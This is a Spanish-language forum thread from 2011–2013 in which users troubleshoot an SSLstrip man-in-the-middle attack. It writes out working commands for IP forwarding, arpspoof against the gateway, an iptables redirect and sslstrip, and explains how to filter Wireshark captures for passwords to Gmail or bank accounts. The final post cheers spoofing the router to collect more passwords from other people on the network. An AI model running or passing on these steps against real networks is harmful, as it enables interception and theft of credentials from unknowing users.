SSLstrip 0.9 no funciona...

alpha015 · 28 Diciembre 2011, 00:55 AM

Buenas, en primer lugar feliz navidad. En segundo lugar quería saber si alguien puede resolverme unas dudas. Inicio en mi red sslstrip 0.9, empiezo a capturar con Wireshark y accedo a gmail, pero no logro descifrar los datos de acceso... gracias por adelantado.

ps3ps3ps3 · 30 Diciembre 2011, 00:11 AM

Yo hago lo mismo que tu,con VirtualBox y no me captura nada.. haber si alguien nos dice algo.

Saludoss.

alpha015 · 30 Diciembre 2011, 00:56 AM

Ya me funciona... joder, no me acordaba que al hacer el Mitm tengo que poner la puerta de enlace y no mi ip xD: ifconfig (para ver nuestra interfaz), dhclient <interfaz> (para ver nuestra ip) y arpspoof -i <interfaz> <puertadeenlace>. Con respecto a lo de Virtualbox haces:

configuracion -> red -> adaptador 1 -> habilitar adaptador de red -> NAT
adaptador 2 -> habilitar adaptador de red -> adaptador puente -> seleccionar tarjeta de red

Saludos.

Pd.: sslstrip creo que no rompe tu ssl si no el de los otros ordenadores de tu red.

alpha015 · 30 Diciembre 2011, 00:58 AM

Por cierto, ¿por qué jamones wireshark solo me captura paquetes ssdp?

ps3ps3ps3 · 30 Diciembre 2011, 02:48 AM

Cita de: alpha015 en 30 Diciembre 2011, 00:56 AM
Ya me funciona... joder, no me acordaba que al hacer el Mitm tengo que poner la puerta de enlace y no mi ip xD: ifconfig (para ver nuestra interfaz), dhclient <interfaz> (para ver nuestra ip) y arpspoof -i <interfaz> <puertadeenlace>. Con respecto a lo de Virtualbox haces:

configuracion -> red -> adaptador 1 -> habilitar adaptador de red -> NAT
adaptador 2 -> habilitar adaptador de red -> adaptador puente -> seleccionar tarjeta de red

Saludos.

Pd.: sslstrip creo que no rompe tu ssl si no el de los otros ordenadores de tu red.

Gracias,( ya tengo VBox configurado

)que lio llevo,llevo poco con Linux y en este mundillo... Yo lo que hago es ejecuto 3 terminales en el primero pongo:
echo 1 > /proc/sys/net/ipv4/ip_forward

En los otros 2,en uno pongo sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3
y en la otra consola al contrario:
sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1

En las pantallas se ve que esta haciendo arp,luego en otra consola activo sslstrip y iptables y ya en otra pongo dsniff -i wlan0,y ahora me meto en una pagina https... (desde Vbox claro) o cualquier pagina pero nada,no sale nada,hago algo mal? Gracias

alpha015 · 30 Diciembre 2011, 12:48 PM

Cita de: ps3ps3ps3 en 30 Diciembre 2011, 02:48 AM
Gracias,( ya tengo VBox configurado )que lio llevo,llevo poco con Linux y en este mundillo... Yo lo que hago es ejecuto 3 terminales en el primero pongo:
echo 1 > /proc/sys/net/ipv4/ip_forward

En los otros 2,en uno pongo sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3
y en la otra consola al contrario:
sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1

En las pantallas se ve que esta haciendo arp,luego en otra consola activo sslstrip y iptables y ya en otra pongo dsniff -i wlan0,y ahora me meto en una pagina https... (desde Vbox claro) o cualquier pagina pero nada,no sale nada,hago algo mal? Gracias

Haber... llevas un pollo mental... lo mejor sería que utilizaras 2 ordenadores, atacante y víctima, pero si solo tienes uno pues nada. No necesitan abrir 3 consolas y mucho menos realizar 2 veces el ataque. Acuérdate además de usar la última versión de SSLstrip, la 0.9:

En la 1ª consola:
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo sslstrip -a -l 10000

En la 2ª consola:
sudo arpspoof -i wlan0 <puertadeenlace>

*wlan0 o la interfaz que tengas.

Dsniff no lo controlo, te recomiendo que captures con Wireshark...
Por cierto, con mi cuenta no podia redireccionar el tráfico del 80 por falta de permisos asi que lo hago desde root, no se si a ti te dejara... Un saludo.

ps3ps3ps3 · 30 Diciembre 2011, 13:23 PM

Jajaja gracias por tu ayuda hombre,pero no habia que hacer el ataque en ambas direcciones? Router-victima,victima-router? Probare como me dices,ya te cuento.

Gracias y Saludos.

EDITO: El "problema" esta en que es un maquina virtual la victima?,segun me dijeron es lo mismo que un pc.

Ya probe hace tiempo wireshark y si pilla algo pero me registro en un foro https y como no entiendo una @"!!% quiero hacerlo con Dsniff,que creo que se entiende mejor... Saludos.

alpha015 · 30 Diciembre 2011, 20:58 PM

Cita de: ps3ps3ps3 en 30 Diciembre 2011, 13:23 PM
Jajaja gracias por tu ayuda hombre,pero no habia que hacer el ataque en ambas direcciones? Router-victima,victima-router? Probare como me dices,ya te cuento.

Gracias y Saludos.

EDITO: El "problema" esta en que es un maquina virtual la victima?,segun me dijeron es lo mismo que un pc.

Ya probe hace tiempo wireshark y si pilla algo pero me registro en un foro https y como no entiendo una @"!!% quiero hacerlo con Dsniff,que creo que se entiende mejor... Saludos.

De nada. Haber, el ataque consiste en situarse entre la víctima o víctimas y el router engañándolo y caputarando así todos los paquetes. Sólo hay que realizar un ataque y eso de ambas direcciones que dices no es más que el protocolo tcp/ip al enviar la victima una peticion y esta sea respondida.

Efectivamente Virtualbox es como si fuera un ordenador, y con respecto a Wireshark tengo que decir que es muy sencillo de usar. Yo empezé con Ettercap pero como me daba muchos problemas me pasé a Wireshark.

Es cierto que SSLstrip te crea un archivo con los datos de acceso interceptados, si los hay, no obstante, en Wireshark filtrando por "http contains pass, Pass, password, etc..." puedes facilmente encontrar las contraseñas de ibanesto o gmail por ejemplo. Te dejo un manual cojonudo:

http://cert.inteco.es/cert/Notas_Actualidad/informe_sobre_analisis_trafico_wireshark_20110211?postAction=getLatestInfo

Sé bueno, un saludo.

Bl4ckP0i7 · 4 Febrero 2013, 17:56 PM

JOder tios gracias por el arpspoof a solo el router para que lleguen mas contraseñas de la gente conectada.... jijiji a hacer locuras